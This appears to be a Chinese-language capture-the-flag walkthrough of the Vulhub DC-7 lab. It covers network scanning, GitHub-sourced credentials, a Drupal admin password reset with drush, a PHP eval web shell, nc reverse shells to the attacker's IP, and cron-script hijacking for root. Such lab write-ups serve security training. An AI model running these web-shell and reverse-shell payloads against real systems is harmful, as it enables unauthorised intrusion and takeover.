Vulhub 靶场 DC-7解析
2024-2-5 09:24:24 Author: www.freebuf.com(查看原文) 阅读量:13 收藏

kali的靶攻击机IP地址:192.168.200.14

DC-7靶机的IP地址:暂时未知

注意:靶机和攻击机应处于一个网卡下

通过MAC地址判断靶机DC-7的IP 地址

1、探索网段内存活的主机

第一种方式:

arp-scan -l 

1707095923_65c03773b9d21675191a4.png!small?1707095925152

第二种方式:

nmap -T4 -sP 192.168.200.0/24 -oN nmap200.sP

1707095931_65c0377b7685e161d3947.png!small?1707095932845

第三种方式:

netdiscover -i eth0 -r 192.168.200.0/24 #eth0代表网卡  -r代表网段

1707095942_65c037860904bedf75375.png!small?1707095943740

2、扫描站点开放的端口信息

nmap -p 1-65535 192.168.200.10 

1707095950_65c0378e0b67b335682b3.png!small?1707095951229

开放的端口有80端口和22端口

3、扫描目录

1707095961_65c03799ae41c587b03c8.png!small?1707095962660

1707095966_65c0379e74381d6716eb6.png!small?1707095967376

1707095972_65c037a41df212d4ebd44.png!small?1707095973221

1707095978_65c037aa177d4e5e2ecfc.png!small?1707095979286

4、网站指纹

第一种方式,可以安装火狐插件

第二种方式,在kali当中执行命令

whatweb -v 192.168.200.10

登陆网站,通过火狐插件可以知道网站使用的CMS是Drupal

1707095987_65c037b3c5290b57c05b9.png!small?1707095988846

当然,可以看到网站欢迎界面的英文信息

DC-7引入了一些“新”概念,但我让你来弄清楚它们是什么。:-)
虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成功。
你要做的就是跳出框框思考。
盒子外面的路。:-)  #可知口令爆破是行不通的

社工手段

百度搜索账户名

1707095996_65c037bc60d3432aaf621.png!small?1707095997414

是github账户,点击进入

1707096006_65c037c608cef18c76a62.png!small?1707096006945

可以看到全是配置文件,然后从底部的英文翻译可以知道,找对地方了

1707096015_65c037cf77d6fc4bc1a6c.png!small?1707096016629

1707096022_65c037d6aff18d47b7cb8.png!small?1707096023705

得到数据库账户密码

账户名:dc7user
密码:MdR3xOgB7#dW
数据库名:Staff

1707096032_65c037e08e471ccc61a04.png!small?1707096033512

几个可能的突破点:

1 网站首页的搜索框,尝试直接查询passwd等文件或直接输入linux命令查看,都以失败收尾;

2 尝试扫描网站目录,没发现什么有价值的目录,倒是发现了robotx.txt文件,这个文件作为常见的可以让爬虫程序扫描的文件之一,控制是否想让爬虫去爬取本站信息;

3 对于robots.txt文件,对里面的目录或者文件都进行了访问查看,未发现有用的信息

1707096041_65c037e9ccb75e650e319.png!small?1707096043131

没啥有用的,从刚才的账号密码入手进行ssh连接,登陆成功之后,看看home目录下有什么其他账户的文件夹

ssh [email protected]

1707096050_65c037f24f2b3740442ca.png!small?1707096051552

发现一个backups文件夹和一个mbox文件

进入backups文件夹,发现两个文件,但都是以gpg结尾的,gpg命令是用来加密文件的,加密后的文件都是乱码

1707096059_65c037fb8e4613613de7e.png!small

1707096075_65c0380bba3c2060ee19c.png!small?1707096077267

进入mbox中发现脚本文件的路径

1707096084_65c038141a2b538570d0c.png!small?1707096085162

dc7user@dc-7:~$ cd /opt/scripts

dc7user@dc-7:/opt/scripts$ cat backups.sh 

主要信息:

Shell脚本文件 /opt/scripts/backups.sh

数据库文件:/home/dc7user/backups/website.sql

网站数据: /home/dc7user/backups/website.tar.gz

1707096093_65c0381dbb0a1955d607d.png!small?1707096095230

drush user-password admin --password="new_pass" 
#想要更改您的密码?就这么简单。
#记得执行命令前先切换到Drupal的目录下面。
cd /var/www/html/
#Drupal默认账户是admin  123456为我修改的密码。
drush user-password admin --password="123456" 

网页都会存在一个admin账户,也可以在网页的登录界面进行尝试,提示修改成功

1707096101_65c03825c4dee161e0175.png!small?1707096102730

来到网站后台,使用admin/123456登录网站,成功登录

http://192.168.200.10/user/login

1707096110_65c0382e1eb22dccafd99.png!small?1707096111153

在Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入

php介绍页面如下,模块包下载地址

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

依次点击

1707096126_65c0383e1fbd1f9f988f2.png!small?1707096127270

安装完之后,跳转,然后点击激活

1707096138_65c0384ae1c1fcc6c6f81.png!small?1707096139900

1707096145_65c0385104e3c8bc11863.png!small?1707096146062

1707096151_65c038572566cb9339972.png!small?1707096152250

对该页面进行编辑,添加一句话PHP代码,并保存为PHP代码

<?php
@eval($POST[123]);
?>

1707096160_65c038603e6931241dfda.png!small?1707096161521

欢迎页面是网站的首页,所以直接使用中国蚁剑连接网站,成功连接getshell

1707096169_65c038694af0983d03afc.png!small?1707096170533

反弹SHELL

习惯性的反弹了一次shell到kali,在这里不反弹shell到kali下面也可以在蚁剑虚拟终端上做下面步骤

在kali监听6666端口,并反弹shell到kali,切换shell外壳

nc -e /bin/bash 192.168.200.14 6666
nc -lvvp 6666
python -c 'import pty;pty.spawn("/bin/bash")'

1707096177_65c038719a4d6b944d5b9.png!small?1707096178786

当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

1707096184_65c03878c71e4672650a6.png!small?1707096185739

提权

写入反弹shell代码到backups.sh脚本文件中,并在kali监听8899端口,等待计划任务执行,稍微等待后成功getshell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.200.14 8899 >/tmp/f" >> backups.sh

nc -lvvp 8899

1707096191_65c0387fea647e8028fb7.png!small?1707096193124

# 记得kali也要开启侦听

nc -lvvp 8899

等待之后....

1707096200_65c03888a9077763bfb6b.png!small?1707096202307

获得flag


文章来源: https://www.freebuf.com/articles/web/391488.html
如有侵权请联系:admin#unsafe.sh